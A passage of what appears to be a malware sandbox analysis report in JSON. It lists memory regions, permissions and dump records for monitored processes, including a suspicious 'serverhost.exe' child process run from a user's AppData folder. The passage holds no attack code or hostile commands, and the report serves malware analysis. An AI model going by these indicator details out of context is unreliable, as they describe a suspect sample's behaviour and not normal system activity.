"ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4268031, "entry_point": 0, "filename": null, "id": "region_1576", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:14.511", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001580-addr_0x0000000001d80000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31227903, "entry_point": 0, "filename": null, "id": "region_1580", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:01:14.522", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001584-addr_0x0000000000ac0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 11272192, "type": "region", "version": 1 }, "end_va": 11345919, "entry_point": 0, "filename": null, "id": "region_1584", "name": "private_0x0000000000ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11272192, "timestamp": "00:01:14.532", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001588-addr_0x0000000000440000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4530175, "entry_point": 0, "filename": null, "id": "region_1588", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:14.543", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001589-addr_0x0000000000420000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4378623, "entry_point": 0, "filename": null, "id": "region_1589", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:14.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1590", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:01:14.550", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001591-addr_0x0000000000460000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_285", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4640767, "entry_point": 0, "filename": null, "id": "region_1591", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:01:14.554", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_11", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000011-region_00001592-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1592", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:16.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1593", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:16.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_1594", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:16.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12852624, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe", "id": "region_1595", "name": "serverhost.exemh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:16.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1596", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:16.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1597", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:16.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1598", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:16.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_1599", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:01:16.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1600", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:16.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1601", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:16.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1602", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:16.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_1603", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:01:16.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_1604", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:16.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1605", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:16.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1606", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:16.108", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1607", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:16.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1608", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:01:16.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1609", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:16.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1610", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:16.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1611", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:16.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1612", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:16.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1613", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:16.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1614", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:16.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1615", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:16.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1616", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:16.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1617", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:16.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1618", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:16.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1619", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:16.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1620", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:16.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1621", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:16.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1622", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:16.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1623", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:16.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1540095, "entry_point": 0, "filename": null, "id": "region_1624", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:16.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1625", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:16.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1626", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:16.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1627", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1628", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1667071, "entry_point": 0, "filename": null, "id": "region_1629", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_1630", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_1631", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_1632", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 9842687, "entry_point": 0, "filename": null, "id": "region_1633", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:16.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1634", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:16.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1635", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:16.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 12840959, "entry_point": 9895936, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1636", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 9895936, "timestamp": "00:01:16.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_1637", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:16.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1638", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:16.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 4063232, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1639", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:01:16.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_1640", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:16.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 26869760, "type": "region", "version": 1 }, "end_va": 27918335, "entry_point": 0, "filename": null, "id": "region_1641", "name": "private_0x00000000019a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26869760, "timestamp": "00:01:16.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 